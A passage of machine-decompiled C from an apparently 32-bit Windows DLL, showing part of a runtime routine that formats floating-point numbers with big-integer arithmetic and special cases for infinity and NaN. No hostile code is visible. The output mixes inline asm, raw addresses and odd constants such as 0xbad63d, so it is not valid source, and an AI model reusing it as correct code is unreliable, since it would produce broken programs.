    				signed int _t1156;
    				signed int _t1157;
    				void* _t1158;
    				signed int _t1159;
    				signed int _t1160;
    				signed int _t1161;
    				void* _t1164;
    				signed int _t1165;
    				signed int _t1166;
    				signed int _t1167;
    				signed int _t1168;
    				signed int _t1169;
    				signed int* _t1172;
    				signed int _t1173;
    				signed int _t1174;
    				signed int _t1175;
    				signed int _t1176;
    				intOrPtr* _t1178;
    				intOrPtr* _t1179;
    				signed int _t1181;
    				signed int _t1183;
    				signed int _t1186;
    				signed int _t1192;
    				signed int _t1196;
    				signed int _t1197;
    				intOrPtr _t1199;
    				intOrPtr _t1200;
    				signed int _t1205;
    				signed int _t1208;
    				signed int _t1209;
    				signed int _t1210;
    				signed int _t1211;
    				signed int _t1212;
    				signed int _t1213;
    				signed int _t1215;
    				signed int _t1216;
    				signed int _t1217;
    				signed int _t1218;
    				signed int _t1220;
    				signed int _t1221;
    				signed int _t1222;
    				signed int _t1223;
    				signed int _t1224;
    				signed int _t1226;
    				signed int _t1227;
    				signed int _t1229;
    				signed int _t1231;
    				signed int _t1233;
    				signed int _t1235;
    				signed int* _t1237;
    				signed int* _t1241;
    				signed int _t1250;
    
    				_t725 =  *0x1001d018; // 0x26c1db24
    				_v8 = _t725 ^ _t1235;
    				_t1016 = _a20;
    				_t1145 = _a16;
    				_v1924 = _t1145;
    				_v1920 = _t1016;
    				E1000B5F4( &_v1944, __eflags);
    				_t1196 = _a8;
    				_t730 = 0x2d;
    				if((_t1196 & 0x80000000) == 0) {
    					_t730 = 0x120;
    				}
    				 *_t1145 = _t730;
    				 *((intOrPtr*)(_t1145 + 8)) = _t1016;
    				_t1146 = _a4;
    				if((_t1196 & 0x7ff00000) != 0) {
    					L5:
    					_t735 = E10007D68( &_a4);
    					_pop(_t1031);
    					__eflags = _t735;
    					if(_t735 != 0) {
    						_t1031 = _v1924;
    						 *((intOrPtr*)(_v1924 + 4)) = 1;
    					}
    					_t736 = _t735 - 1;
    					__eflags = _t736;
    					if(_t736 == 0) {
    						_push("1#INF");
    						goto L308;
    					} else {
    						_t751 = _t736 - 1;
    						__eflags = _t751;
    						if(_t751 == 0) {
    							_push("1#QNAN");
    							goto L308;
    						} else {
    							_t752 = _t751 - 1;
    							__eflags = _t752;
    							if(_t752 == 0) {
    								_push("1#SNAN");
    								goto L308;
    							} else {
    								__eflags = _t752 == 1;
    								if(_t752 == 1) {
    									_push("1#IND");
    									goto L308;
    								} else {
    									_v1928 = _v1928 & 0x00000000;
    									_a4 = _t1146;
    									_a8 = _t1196 & 0x7fffffff;
    									_t1250 = _a4;
    									asm("fst qword [ebp-0x768]");
    									_t1150 = _v1896;
    									_v1916 = _a12 + 1;
    									_t1036 = _t1150 >> 0x14;
    									_t758 = _t1036 & 0x000007ff;
    									__eflags = _t758;
    									if(_t758 != 0) {
    										_t1101 = 0;
    										_t758 = 0;
    										__eflags = 0;
    									} else {
    										_t1101 = 1;
    									}
    									_t1151 = _t1150 & 0x000fffff;
    									_t1019 = _v1900 + _t758;
    									asm("adc edi, esi");
    									__eflags = _t1101;
    									_t1037 = _t1036 & 0x000007ff;
    									_t1205 = _t1037 - 0x434 + (0 | _t1101 != 0x00000000) + 1;
    									_v1872 = _t1205;
    									E1000E330(_t1037, _t1250);
    									_push(_t1037);
    									_push(_t1037);
    									 *_t1237 = _t1250;
    									_t764 = E10010280(E1000E440(_t1151, _t1205), _t1250);
    									_v1904 = _t764;
    									__eflags = _t764 - 0x7fffffff;
    									if(_t764 == 0x7fffffff) {
    										L16:
    										__eflags = 0;
    										_v1904 = 0;
    									} else {
    										__eflags = _t764 - 0x80000000;
    										if(_t764 == 0x80000000) {
    											goto L16;
    										}
    									}
    									_v468 = _t1019;
    									__eflags = _t1151;
    									_v464 = _t1151;
    									_t1022 = (0 | _t1151 != 0x00000000) + 1;
    									_v472 = _t1022;
    									__eflags = _t1205;
    									if(_t1205 < 0) {
    										__eflags = _t1205 - 0xfffffc02;
    										if(_t1205 == 0xfffffc02) {
    											L101:
    											_t766 =  *((intOrPtr*)(_t1235 + _t1022 * 4 - 0x1d4));
    											_t195 =  &_v1896;
    											 *_t195 = _v1896 & 0x00000000;
    											__eflags =  *_t195;
    											asm("bsr eax, eax");
    											if( *_t195 == 0) {
    												_t1040 = 0;
    												__eflags = 0;
    											} else {
    												_t1040 = _t766 + 1;
    											}
    											_t767 = 0x20;
    											_t768 = _t767 - _t1040;
    											__eflags = _t768 - 1;
    											_t769 = _t768 & 0xffffff00 | _t768 - 0x00000001 > 0x00000000;
    											__eflags = _t1022 - 0x73;
    											_v1865 = _t769;
    											_t1041 = _t1040 & 0xffffff00 | _t1022 - 0x00000073 > 0x00000000;
    											__eflags = _t1022 - 0x73;
    											if(_t1022 != 0x73) {
    												L107:
    												_t770 = 0;
    												__eflags = 0;
    											} else {
    												__eflags = _t769;
    												if(_t769 == 0) {
    													goto L107;
    												} else {
    													_t770 = 1;
    												}
    											}
    											__eflags = _t1041;
    											if(_t1041 != 0) {
    												L126:
    												_v1400 = _v1400 & 0x00000000;
    												_t224 =  &_v472;
    												 *_t224 = _v472 & 0x00000000;
    												__eflags =  *_t224;
    												_push(0);
    												_push( &_v1396);
    												_push(0x1cc);
    												_push( &_v468);
    												L313();
    												_t1237 =  &(_t1237[4]);
    											} else {
    												__eflags = _t770;
    												if(_t770 != 0) {
    													goto L126;
    												} else {
    													_t1068 = 0x72;
    													__eflags = _t1022 - _t1068;
    													if(_t1022 < _t1068) {
    														_t1068 = _t1022;
    													}
    													__eflags = _t1068 - 0xffffffff;
    													if(_t1068 != 0xffffffff) {
    														_t1223 = _t1068;
    														_t1178 =  &_v468 + _t1068 * 4;
    														_v1880 = _t1178;
    														while(1) {
    															__eflags = _t1223 - _t1022;
    															if(_t1223 >= _t1022) {
    																_t208 =  &_v1876;
    																 *_t208 = _v1876 & 0x00000000;
    																__eflags =  *_t208;
    															} else {
    																_v1876 =  *_t1178;
    															}
    															_t210 = _t1223 - 1; // 0x70
    															__eflags = _t210 - _t1022;
    															if(_t210 >= _t1022) {
    																_t1128 = 0;
    																__eflags = 0;
    															} else {
    																_t1128 =  *(_t1178 - 4);
    															}
    															_t1178 = _t1178 - 4;
    															_t936 = _v1880;
    															_t1223 = _t1223 - 1;
    															 *_t936 = _t1128 >> 0x0000001f ^ _v1876 + _v1876;
    															_v1880 = _t936 - 4;
    															__eflags = _t1223 - 0xffffffff;
    															if(_t1223 == 0xffffffff) {
    																break;
    															}
    															_t1022 = _v472;
    														}
    														_t1205 = _v1872;
    													}
    													__eflags = _v1865;
    													if(_v1865 == 0) {
    														_v472 = _t1068;
    													} else {
    														_t218 = _t1068 + 1; // 0x73
    														_v472 = _t218;
    													}
    												}
    											}
    											_t1154 = 1 - _t1205;
    											E10001E90(_t1154,  &_v1396, 0, 1);
    											__eflags = 1;
    											 *(_t1235 + 0xbad63d) = 1 << (_t1154 & 0x0000001f);
    											_t778 = 0xbadbae;
    										} else {
    											_v1396 = _v1396 & 0x00000000;
    											_t1069 = 2;
    											_v1392 = 0x100000;
    											_v1400 = _t1069;
    											__eflags = _t1022 - _t1069;
    											if(_t1022 == _t1069) {
    												_t1132 = 0;
    												__eflags = 0;
    												while(1) {
    													_t938 =  *((intOrPtr*)(_t1235 + _t1132 - 0x570));
    													__eflags = _t938 -  *((intOrPtr*)(_t1235 + _t1132 - 0x1d0));
    													if(_t938 !=  *((intOrPtr*)(_t1235 + _t1132 - 0x1d0))) {
    														goto L101;
    													}
    													_t1132 = _t1132 + 4;
    													__eflags = _t1132 - 8;
    													if(_t1132 != 8) {
    														continue;
    													} else {
    														_t166 =  &_v1896;
    														 *_t166 = _v1896 & 0x00000000;
    														__eflags =  *_t166;
    														asm("bsr eax, edi");
    														if( *_t166 == 0) {
    															_t1133 = 0;
    															__eflags = 0;
    														} else {
    															_t1133 = _t938 + 1;
    														}
    														_t939 = 0x20;
    														_t1224 = _t1069;
    														__eflags = _t939 - _t1133 - _t1069;
    														_t941 =  &_v460;
    														_v1880 = _t941;
    														_t1179 = _t941;
    														_t171 =  &_v1865;
    														 *_t171 = _t939 - _t1133 - _t1069 > 0;
    														__eflags =  *_t171;
    														while(1) {
    															__eflags = _t1224 - _t1022;
    															if(_t1224 >= _t1022) {
    																_t173 =  &_v1876;
    																 *_t173 = _v1876 & 0x00000000;
    																__eflags =  *_t173;
    															} else {
    																_v1876 =  *_t1179;
    															}
    															_t175 = _t1224 - 1; // 0x0
    															__eflags = _t175 - _t1022;
    															if(_t175 >= _t1022) {
    																_t1134 = 0;
    																__eflags = 0;
    															} else {
    																_t1134 =  *(_t1179 - 4);
    															}
    															_t1179 = _t1179 - 4;
    															_t945 = _v1880;
    															_t1224 = _t1224 - 1;
    															 *_t945 = _t1134 >> 0x0000001e ^ _v1876 << 0x00000002;
    															_v1880 = _t945 - 4;
    															__eflags = _t1224 - 0xffffffff;
    															if(_t1224 == 0xffffffff) {
    																break;
    															}
    															_t1022 = _v472;
    														}
    														__eflags = _v1865;
    														_t1070 = _t1069 - _v1872;
    														_v472 = (0 | _v1865 != 0x00000000) + _t1069;
    														_t1181 = _t1070 >> 5;
    														_v1884 = _t1070;
    														_t1226 = _t1181 << 2;
    														E10001E90(_t1181,  &_v1396, 0, _t1226);
    														 *(_t1235 + _t1226 - 0x570) = 1 << (_v1884 & 0x0000001f);
    														_t778 = _t1181 + 1;
    													}
    													goto L128;
    												}
    											}
    											goto L101;
    										}
    										L128:
    										_v1400 = _t778;
    										_t1025 = 0x1cc;
    										_v936 = _t778;
    										_t779 = _t778 << 2;
    										__eflags = _t779;
    										_push(_t779);
    										_push( &_v1396);
    										_push(0x1cc);
    										_push( &_v932);
    										L313();
    										_t1241 =  &(_t1237[7]);
    									} else {
    										_v1396 = _v1396 & 0x00000000;
    										_t1227 = 2;
    										_v1392 = 0x100000;
    										_v1400 = _t1227;
    										__eflags = _t1022 - _t1227;
    										if(_t1022 != _t1227) {
    											L53:
    											_t956 = _v1872 + 1;
    											_t957 = _t956 & 0x0000001f;
    											_t1073 = 0x20;
    											_v1876 = _t957;
    											_t1183 = _t956 >> 5;
    											_v1872 = _t1183;
    											_v1908 = _t1073 - _t957;
    											_t960 = E100100A0(1, _t1073 - _t957, 0);
    											_t1075 =  *((intOrPtr*)(_t1235 + _t1022 * 4 - 0x1d4));
    											_t961 = _t960 - 1;
    											_t108 =  &_v1896;
    											 *_t108 = _v1896 & 0x00000000;
    											__eflags =  *_t108;
    											asm("bsr ecx, ecx");
    											_v1884 = _t961;
    											_v1912 =  !_t961;
    											if( *_t108 == 0) {
    												_t1076 = 0;
    												__eflags = 0;
    											} else {
    												_t1076 = _t1075 + 1;
    											}
    											_t963 = 0x20;
    											_t964 = _t963 - _t1076;
    											_t1139 = _t1022 + _t1183;
    											__eflags = _v1876 - _t964;
    											_v1892 = _t1139;
    											_t965 = _t964 & 0xffffff00 | _v1876 - _t964 > 0x00000000;
    											__eflags = _t1139 - 0x73;
    											_v1865 = _t965;
    											_t1077 = _t1076 & 0xffffff00 | _t1139 - 0x00000073 > 0x00000000;
    											__eflags = _t1139 - 0x73;
    											if(_t1139 != 0x73) {
    												L59:
    												_t966 = 0;
    												__eflags = 0;
    											} else {
    												__eflags = _t965;
    												if(_t965 == 0) {
    													goto L59;
    												} else {
    													_t966 = 1;
    												}
    											}
    											__eflags = _t1077;
    											if(_t1077 != 0) {
    												L81:
    												__eflags = 0;
    												_t1025 = 0x1cc;
    												_push(0);
    												_v1400 = 0;
    												_v472 = 0;
    												_push( &_v1396);
    												_push(0x1cc);
    												_push( &_v468);
    												L313();
    												_t1237 =  &(_t1237[4]);
    											} else {
    												__eflags = _t966;
    												if(_t966 != 0) {
    													goto L81;
    												} else {
    													_t1078 = 0x72;
    													__eflags = _t1139 - _t1078;
    													if(_t1139 >= _t1078) {
    														_t1139 = _t1078;
    														_v1892 = _t1078;
    													}
    													_t974 = _t1139;
    													_v1880 = _t974;
    													__eflags = _t1139 - 0xffffffff;
    													if(_t1139 != 0xffffffff) {
    														_t1140 = _v1872;
    														_t1229 = _t1139 - _t1140;
    														__eflags = _t1229;
    														_t1082 =  &_v468 + _t1229 * 4;
    														_v1888 = _t1082;
    														while(1) {
    															__eflags = _t974 - _t1140;
    															if(_t974 < _t1140) {
    																break;
    															}
    															__eflags = _t1229 - _t1022;
    															if(_t1229 >= _t1022) {
    																_t1186 = 0;
    																__eflags = 0;
    															} else {
    																_t1186 =  *_t1082;
    															}
    															__eflags = _t1229 - 1 - _t1022;
    															if(_t1229 - 1 >= _t1022) {
    																_t979 = 0;
    																__eflags = 0;
    															} else {
    																_t979 =  *(_t1082 - 4);
    															}
    															_t982 = _v1880;
    															_t1082 = _v1888 - 4;
    															_v1888 = _t1082;
    															 *(_t1235 + _t982 * 4 - 0x1d0) = (_t1186 & _v1884) << _v1876 | (_t979 & _v1912) >> _v1908;
    															_t974 = _t982 - 1;
    															_t1229 = _t1229 - 1;
    															_v1880 = _t974;
    															__eflags = _t974 - 0xffffffff;
    															if(_t974 != 0xffffffff) {
    																_t1022 = _v472;
    																continue;
    															}
    															break;
    														}
    														_t1139 = _v1892;
    														_t1183 = _v1872;
    														_t1227 = 2;
    													}
    													__eflags = _t1183;
    													if(_t1183 != 0) {
    														__eflags = 0;
    														memset( &_v468, 0, _t1183 << 2);
    														_t1237 =  &(_t1237[3]);
    													}
    													__eflags = _v1865;
    													_t1025 = 0x1cc;
    													if(_v1865 == 0) {
    														_v472 = _t1139;
    													} else {
    														_v472 = _t1139 + 1;
    													}
    												}
    											}
    											_v1392 = _v1392 & 0x00000000;
    											_v1396 = _t1227;
    											_v1400 = 1;
    											_v936 = 1;
    											_push(4);
    										} else {
    											_t1086 = 0;
    											__eflags = 0;
    											while(1) {
    												__eflags =  *((intOrPtr*)(_t1235 + _t1086 - 0x570)) -  *((intOrPtr*)(_t1235 + _t1086 - 0x1d0));
    												if( *((intOrPtr*)(_t1235 + _t1086 - 0x570)) !=  *((intOrPtr*)(_t1235 + _t1086 - 0x1d0))) {
    													goto L53;
    												}
    												_t1086 = _t1086 + 4;
    												__eflags = _t1086 - 8;
    												if(_t1086 != 8) {
    													continue;
    												} else {
    													_t985 = _v1872 + 2;
    													_t986 = _t985 & 0x0000001f;
    													_t1087 = 0x20;
    													_t1088 = _t1087 - _t986;
    													_v1888 = _t986;
    													_t1231 = _t985 >> 5;
    													_v1876 = _t1231;
    													_v1908 = _t1088;
    													_t989 = E100100A0(1, _t1088, 0);
    													_v1896 = _v1896 & 0x00000000;
    													_t990 = _t989 - 1;
    													__eflags = _t990;
    													asm("bsr ecx, edi");
    													_v1884 = _t990;
    													_v1912 =  !_t990;
    													if(_t990 == 0) {
    														_t1089 = 0;
    														__eflags = 0;
    													} else {
    														_t1089 = _t1088 + 1;
    													}
    													_t992 = 0x20;
    													_t993 = _t992 - _t1089;
    													_t1142 = _t1231 + 2;
    													__eflags = _v1888 - _t993;
    													_v1880 = _t1142;
    													_t994 = _t993 & 0xffffff00 | _v1888 - _t993 > 0x00000000;
    													__eflags = _t1142 - 0x73;
    													_v1865 = _t994;
    													_t1090 = _t1089 & 0xffffff00 | _t1142 - 0x00000073 > 0x00000000;
    													__eflags = _t1142 - 0x73;
    													if(_t1142 != 0x73) {
    														L28:
    														_t995 = 0;
    														__eflags = 0;
    													} else {
    														__eflags = _t994;
    														if(_t994 == 0) {
    															goto L28;
    														} else {
    															_t995 = 1;
    														}
    													}
    													__eflags = _t1090;
    													if(_t1090 != 0) {
    														L50:
    														__eflags = 0;
    														_t1025 = 0x1cc;
    														_push(0);
    														_v1400 = 0;
    														_v472 = 0;
    														_push( &_v1396);
    														_push(0x1cc);
    														_push( &_v468);
    														L313();
    														_t1237 =  &(_t1237[4]);
    													} else {
    														__eflags = _t995;
    														if(_t995 != 0) {
    															goto L50;
    														} else {
    															_t1093 = 0x72;
    															__eflags = _t1142 - _t1093;
    															if(_t1142 >= _t1093) {
    																_t1142 = _t1093;
    																_v1880 = _t1093;
    															}
    															_t1094 = _t1142;
    															_v1892 = _t1094;
    															__eflags = _t1142 - 0xffffffff;
    															if(_t1142 != 0xffffffff) {
    																_t1143 = _v1876;
    																_t1233 = _t1142 - _t1143;
    																__eflags = _t1233;
    																_t1004 =  &_v468 + _t1233 * 4;
    																_v1872 = _t1004;
    																while(1) {
    																	__eflags = _t1094 - _t1143;
    																	if(_t1094 < _t1143) {
    																		break;
    																	}
    																	__eflags = _t1233 - _t1022;
    																	if(_t1233 >= _t1022) {
    																		_t1192 = 0;
    																		__eflags = 0;
    																	} else {
    																		_t1192 =  *_t1004;
    																	}
    																	__eflags = _t1233 - 1 - _t1022;
    																	if(_t1233 - 1 >= _t1022) {
    																		_t1006 = 0;
    																		__eflags = 0;
    																	} else {
    																		_t1006 =  *(_v1872 - 4);
    																	}
    																	_t1099 = _v1892;
    																	 *(_t1235 + _t1099 * 4 - 0x1d0) = (_t1006 & _v1912) >> _v1908 | (_t1192 & _v1884) << _v1888;
    																	_t1094 = _t1099 - 1;
    																	_t1233 = _t1233 - 1;
    																	_t1004 = _v1872 - 4;
    																	_v1892 = _t1094;
    																	_v1872 = _t1004;
    																	__eflags = _t1094 - 0xffffffff;
    																	if(_t1094 != 0xffffffff) {
    																		_t1022 = _v472;
    																		continue;
    																	}
    																	break;
    																}
    																_t1142 = _v1880;
    																_t1231 = _v1876;
    															}
    															__eflags = _t1231;
    															if(_t1231 != 0) {
    																__eflags = 0;
    																memset( &_v468, 0, _t1231 << 2);
    																_t1237 =  &(_t1237[3]);
    															}
    															__eflags = _v1865;
    															_t1025 = 0x1cc;
    															if(_v1865 == 0) {
    																_v472 = _t1142;
    															} else {
    																_v472 = _t1142 + 1;
    															}
    														}
    													}
    													_v1392 = _v1392 & 0x00000000;
    													_t999 = 4;
    													__eflags = 1;
    													_v1396 = _t999;
    													_v1400 = 1;
    													_v936 = 1;
    													_push(_t999);
    												}
    												goto L52;
    											}
    											goto L53;
    										}
    										L52:
    										_push( &_v1396);
    										_push(_t1025);
    										_push( &_v932);
    										L313();
    										_t1241 =  &(_t1237[4]);
    									}
    									_t782 = _v1904;
    									_t1043 = 0xa;
    									_v1912 = _t1043;
    									__eflags = _t782;
    									if(_t782 < 0) {
    										_t783 =  ~_t782;
    										_t784 = _t783 / _t1043;
    										_v1880 = _t784;
    										_t1044 = _t783 % _t1043;
    										_v1884 = _t1044;
    										__eflags = _t784;
    										if(_t784 == 0) {
    											L249:
    											__eflags = _t1044;
    											if(_t1044 != 0) {
    												_t820 =  *(0x10016484 + _t1044 * 4);
    												_v1896 = _t820;
    												__eflags = _t820;
    												if(_t820 == 0) {
    													L260:
    													__eflags = 0;
    													_push(0);
    													_v472 = 0;
    													_v2408 = 0;
    													goto L261;
    												} else {
    													__eflags = _t820 - 1;
    													if(_t820 != 1) {
    														_t1055 = _v472;
    														__eflags = _t1055;
    														if(_t1055 != 0) {
    															_t1161 = 0;
    															_t1213 = 0;
    															__eflags = 0;
    															do {
    																_t1113 = _t820 *  *(_t1235 + _t1213 * 4 - 0x1d0) >> 0x20;
    																 *(_t1235 + _t1213 * 4 - 0x1d0) = _t820 *  *(_t1235 + _t1213 * 4 - 0x1d0) + _t1161;
    																_t820 = _v1896;
    																asm("adc edx, 0x0");
    																_t1213 = _t1213 + 1;
    																_t1161 = _t1113;
    																__eflags = _t1213 - _t1055;
    															} while (_t1213 != _t1055);
    															__eflags = _t1161;
    															if(_t1161 != 0) {
    																_t826 = _v472;
    																__eflags = _t826 - 0x73;
    																if(_t826 >= 0x73) {
    																	goto L260;
    																} else {
    																	 *(_t1235 + _t826 * 4 - 0x1d0) = _t1161;
    																	_v472 = _v472 + 1;
    																}
    															}
    														}
    													}
    												}
    											}
    										} else {
    											do {
    												__eflags = _t784 - 0x26;
    												if(_t784 > 0x26) {
    													_t784 = 0x26;
    												}
    												_t1056 =  *(0x100163ee + _t784 * 4) & 0x000000ff;
    												_v1872 = _t784;
    												_v1400 = ( *(0x100163ee + _t784 * 4) & 0x000000ff) + ( *(0x100163ef + _t784 * 4) & 0x000000ff);
    												E10001E90(_t1056 << 2,  &_v1396, 0, _t1056 << 2);
    												_t837 = E10010340( &(( &_v1396)[_t1056]), 0x10015ae8 + ( *(0x100163ec + _v1872 * 4) & 0x0000ffff) * 4, ( *(0x100163ef + _t784 * 4) & 0x000000ff) << 2);
    												_t1057 = _v1400;
    												_t1241 =  &(_t1241[6]);
    												_v1892 = _t1057;
    												__eflags = _t1057 - 1;
    												if(_t1057 > 1) {
    													__eflags = _v472 - 1;
    													if(_v472 > 1) {
    														__eflags = _t1057 - _v472;
    														_t1164 =  &_v1396;
    														_t838 = _t837 & 0xffffff00 | _t1057 - _v472 > 0x00000000;
    														__eflags = _t838;
    														if(_t838 != 0) {
    															_t1114 =  &_v468;
    														} else {
    															_t1164 =  &_v468;
    															_t1114 =  &_v1396;
    														}
    														_v1908 = _t1114;
    														__eflags = _t838;
    														if(_t838 == 0) {
    															_t1057 = _v472;
    														}
    														_v1876 = _t1057;
    														__eflags = _t838;
    														if(_t838 != 0) {
    															_v1892 = _v472;
    														}
    														_t1115 = 0;
    														_t1215 = 0;
    														_v1864 = 0;
    														__eflags = _t1057;
    														if(_t1057 == 0) {
    															L243:
    															_v472 = _t1115;
    															_t840 = _t1115 << 2;
    															__eflags = _t840;
    															_push(_t840);
    															_t841 =  &_v1860;
    															goto L244;
    														} else {
    															_t1165 = _t1164 -  &_v1860;
    															__eflags = _t1165;
    															_v1928 = _t1165;
    															do {
    																_t847 =  *(_t1235 + _t1165 + _t1215 * 4 - 0x740);
    																_v1896 = _t847;
    																__eflags = _t847;
    																if(_t847 != 0) {
    																	_t848 = 0;
    																	_t1166 = 0;
    																	_t1058 = _t1215;
    																	_v1888 = 0;
    																	__eflags = _v1892;
    																	if(_v1892 == 0) {
    																		L240:
    																		__eflags = _t1058 - 0x73;
    																		if(_t1058 == 0x73) {
    																			goto L258;
    																		} else {
    																			_t1165 = _v1928;
    																			_t1057 = _v1876;
    																			goto L242;
    																		}
    																	} else {
    																		while(1) {
    																			__eflags = _t1058 - 0x73;
    																			if(_t1058 == 0x73) {
    																				goto L235;
    																			}
    																			__eflags = _t1058 - _t1115;
    																			if(_t1058 == _t1115) {
    																				 *(_t1235 + _t1058 * 4 - 0x740) =  *(_t1235 + _t1058 * 4 - 0x740) & 0x00000000;
    																				_t859 = _t848 + 1 + _t1215;
    																				__eflags = _t859;
    																				_v1864 = _t859;
    																				_t848 = _v1888;
    																			}
    																			_t854 =  *(_v1908 + _t848 * 4);
    																			asm("adc edx, 0x0");
    																			 *(_t1235 + _t1058 * 4 - 0x740) =  *(_t1235 + _t1058 * 4 - 0x740) + _t854 * _v1896 + _t1166;
    																			asm("adc edx, 0x0");
    																			_t848 = _v1888 + 1;
    																			_t1058 = _t1058 + 1;
    																			_v1888 = _t848;
    																			_t1166 = _t854 * _v1896 >> 0x20;
    																			_t1115 = _v1864;
    																			__eflags = _t848 - _v1892;
    																			if(_t848 != _v1892) {
    																				continue;
    																			} else {
    																				goto L235;
    																			}
    																			while(1) {
    																				L235:
    																				__eflags = _t1166;
    																				if(_t1166 == 0) {
    																					goto L240;
    																				}
    																				__eflags = _t1058 - 0x73;
    																				if(_t1058 == 0x73) {
    																					goto L258;
    																				} else {
    																					__eflags = _t1058 - _t1115;
    																					if(_t1058 == _t1115) {
    																						_t558 = _t1235 + _t1058 * 4 - 0x740;
    																						 *_t558 =  *(_t1235 + _t1058 * 4 - 0x740) & 0x00000000;
    																						__eflags =  *_t558;
    																						_t564 = _t1058 + 1; // 0x1
    																						_v1864 = _t564;
    																					}
    																					_t852 = _t1166;
    																					_t1166 = 0;
    																					 *(_t1235 + _t1058 * 4 - 0x740) =  *(_t1235 + _t1058 * 4 - 0x740) + _t852;
    																					_t1115 = _v1864;
    																					asm("adc edi, edi");
    																					_t1058 = _t1058 + 1;
    																					continue;
    																				}
    																				goto L246;
    																			}
    																			goto L240;
    																		}
    																		goto L235;
    																	}
    																} else {
    																	__eflags = _t1215 - _t1115;
    																	if(_t1215 == _t1115) {
    																		 *(_t1235 + _t1215 * 4 - 0x740) =  *(_t1235 + _t1215 * 4 - 0x740) & _t847;
    																		_t526 = _t1215 + 1; // 0x1
    																		_t1115 = _t526;
    																		_v1864 = _t1115;
    																	}
    																	goto L242;
    																}
    																goto L246;
    																L242:
    																_t1215 = _t1215 + 1;
    																__eflags = _t1215 - _t1057;
    															} while (_t1215 != _t1057);
    															goto L243;
    														}
    													} else {
    														_t1167 = _v468;
    														_push(_t1057 << 2);
    														_v472 = _t1057;
    														_push( &_v1396);
    														_push(_t1025);
    														_push( &_v468);
    														L313();
    														_t1241 =  &(_t1241[4]);
    														__eflags = _t1167;
    														if(_t1167 == 0) {
    															goto L203;
    														} else {
    															__eflags = _t1167 - 1;
    															if(_t1167 == 1) {
    																goto L245;
    															} else {
    																__eflags = _v472;
    																if(_v472 == 0) {
    																	goto L245;
    																} else {
    																	_t1059 = 0;
    																	_v1896 = _v472;
    																	_t1216 = 0;
    																	__eflags = 0;
    																	do {
    																		_t867 = _t1167;
    																		_t1116 = _t867 *  *(_t1235 + _t1216 * 4 - 0x1d0) >> 0x20;
    																		 *(_t1235 + _t1216 * 4 - 0x1d0) = _t867 *  *(_t1235 + _t1216 * 4 - 0x1d0) + _t1059;
    																		asm("adc edx, 0x0");
    																		_t1216 = _t1216 + 1;
    																		_t1059 = _t1116;
    																		__eflags = _t1216 - _v1896;
    																	} while (_t1216 != _v1896);
    																	goto L208;
    																}
    															}
    														}
    													}
    												} else {
    													_t1168 = _v1396;
    													__eflags = _t1168;
    													if(_t1168 != 0) {
    														__eflags = _t1168 - 1;
    														if(_t1168 == 1) {
    															goto L245;
    														} else {
    															__eflags = _v472;
    															if(_v472 == 0) {
    																goto L245;
    															} else {
    																_t1060 = 0;
    																_v1896 = _v472;
    																_t1217 = 0;
    																__eflags = 0;
    																do {
    																	_t872 = _t1168;
    																	_t1117 = _t872 *  *(_t1235 + _t1217 * 4 - 0x1d0) >> 0x20;
    																	 *(_t1235 + _t1217 * 4 - 0x1d0) = _t872 *  *(_t1235 + _t1217 * 4 - 0x1d0) + _t1060;
    																	asm("adc edx, 0x0");
    																	_t1217 = _t1217 + 1;
    																	_t1060 = _t1117;
    																	__eflags = _t1217 - _v1896;
    																} while (_t1217 != _v1896);
    																L208:
    																__eflags = _t1059;
    																if(_t1059 == 0) {
    																	goto L245;
    																} else {
    																	_t870 = _v472;
    																	__eflags = _t870 - 0x73;
    																	if(_t870 >= 0x73) {
    																		L258:
    																		_push(0);
    																		_v2408 = 0;
    																		_v472 = 0;
    																		_push( &_v2404);
    																		_push(_t1025);
    																		_push( &_v468);
    																		L313();
    																		_t1241 =  &(_t1241[4]);
    																		_t843 = 0;
    																	} else {
    																		 *(_t1235 + _t870 * 4 - 0x1d0) = _t1059;
    																		_v472 = _v472 + 1;
    																		goto L245;
    																	}
    																}
    															}
    														}
    													} else {
    														L203:
    														_v2408 = 0;
    														_v472 = 0;
    														_push(0);
    														_t841 =  &_v2404;
    														L244:
    														_push(_t841);
    														_push(_t1025);
    														_push( &_v468);
    														L313();
    														_t1241 =  &(_t1241[4]);
    														L245:
    														_t843 = 1;
    													}
    												}
    												L246:
    												__eflags = _t843;
    												if(_t843 == 0) {
    													_v2408 = _v2408 & 0x00000000;
    													_v472 = _v472 & 0x00000000;
    													_push(0);
    													L261:
    													_push( &_v2404);
    													_t823 =  &_v468;
    													goto L262;
    												} else {
    													goto L247;
    												}
    												goto L263;
    												L247:
    												_t784 = _v1880 - _v1872;
    												__eflags = _t784;
    												_v1880 = _t784;
    											} while (_t784 != 0);
    											_t1044 = _v1884;
    											goto L249;
    										}
    									} else {
    										_t875 = _t782 / _t1043;
    										_v1908 = _t875;
    										_t1061 = _t782 % _t1043;
    										_v1896 = _t1061;
    										__eflags = _t875;
    										if(_t875 == 0) {
    											L184:
    											__eflags = _t1061;
    											if(_t1061 != 0) {
    												_t1169 =  *(0x10016484 + _t1061 * 4);
    												__eflags = _t1169;
    												if(_t1169 != 0) {
    													__eflags = _t1169 - 1;
    													if(_t1169 != 1) {
    														_t876 = _v936;
    														_v1896 = _t876;
    														__eflags = _t876;
    														if(_t876 != 0) {
    															_t1218 = 0;
    															_t1062 = 0;
    															__eflags = 0;
    															do {
    																_t877 = _t1169;
    																_t1121 = _t877 *  *(_t1235 + _t1062 * 4 - 0x3a0) >> 0x20;
    																 *(_t1235 + _t1062 * 4 - 0x3a0) = _t877 *  *(_t1235 + _t1062 * 4 - 0x3a0) + _t1218;
    																asm("adc edx, 0x0");
    																_t1062 = _t1062 + 1;
    																_t1218 = _t1121;
    																__eflags = _t1062 - _v1896;
    															} while (_t1062 != _v1896);
    															__eflags = _t1218;
    															if(_t1218 != 0) {
    																_t880 = _v936;
    																__eflags = _t880 - 0x73;
    																if(_t880 >= 0x73) {
    																	goto L186;
    																} else {
    																	 *(_t1235 + _t880 * 4 - 0x3a0) = _t1218;
    																	_v936 = _v936 + 1;
    																}
    															}
    														}
    													}
    												} else {
    													L186:
    													_v2408 = 0;
    													_v936 = 0;
    													_push(0);
    													goto L190;
    												}
    											}
    										} else {
    											do {
    												__eflags = _t875 - 0x26;
    												if(_t875 > 0x26) {
    													_t875 = 0x26;
    												}
    												_t1063 =  *(0x100163ee + _t875 * 4) & 0x000000ff;
    												_v1888 = _t875;
    												_v1400 = ( *(0x100163ee + _t875 * 4) & 0x000000ff) + ( *(0x100163ef + _t875 * 4) & 0x000000ff);
    												E10001E90(_t1063 << 2,  &_v1396, 0, _t1063 << 2);
